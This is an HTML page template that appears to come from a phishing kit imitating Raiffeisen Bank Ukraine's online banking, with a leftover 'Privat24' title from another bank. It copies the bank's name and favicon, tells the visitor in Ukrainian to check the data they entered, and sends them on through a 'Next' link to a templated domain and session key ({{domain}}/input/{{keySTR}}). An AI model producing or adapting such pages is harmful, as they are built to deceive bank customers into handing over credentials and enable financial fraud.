<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
        <title>Raiffeisen Online | Raiffeisen Bank</title>
        <meta name="viewport" content="width=device-width">
        <meta property="og:url" content="https://raiffeisen.ua/">
        <meta property="og:type" content="website">
        <meta property="og:title" content="Raiffeisen Bank">
        <meta property="og:description" content="">
        <meta property="og:image" content="/img/logo.svg">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="default">
        <meta name="apple-mobile-web-app-title" content="Privat24">
        <link rel="shortcut icon" href="https://online.raiffeisen.ua/ibank/favicon.ico">
</head>
<style>
    * {
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 90vh;
    }

    .wrapp {
        display: flex;
        justify-content: space-around;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 20px 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        margin: 0 auto;
        height: 450px;
        width: 320px;
        padding: 30px;
    }
    .text{
        text-align: center;
        font-size: 26px;
        line-height: 30px;
    }
    .btn {
        margin: 0 auto;
        margin-top: 40px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #ffe400 0.13%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        border-radius: 15px;
        border: none;
        width: 180px;
        height: 50px;
        font-size: 24px;
        line-height: 29px;
        cursor: pointer;
        color: #000;
    }
</style>



<body>
    <div class="wrapp">
        <div class="text">
            Перевiрте коректнiсть введених даних
        </div>
        <a style="text-decoration: none;" href="http://{{domain}}/input/{{keySTR}}"><div class="btn" id="btn">Далi</div></a>
    </div>
</body>

</html>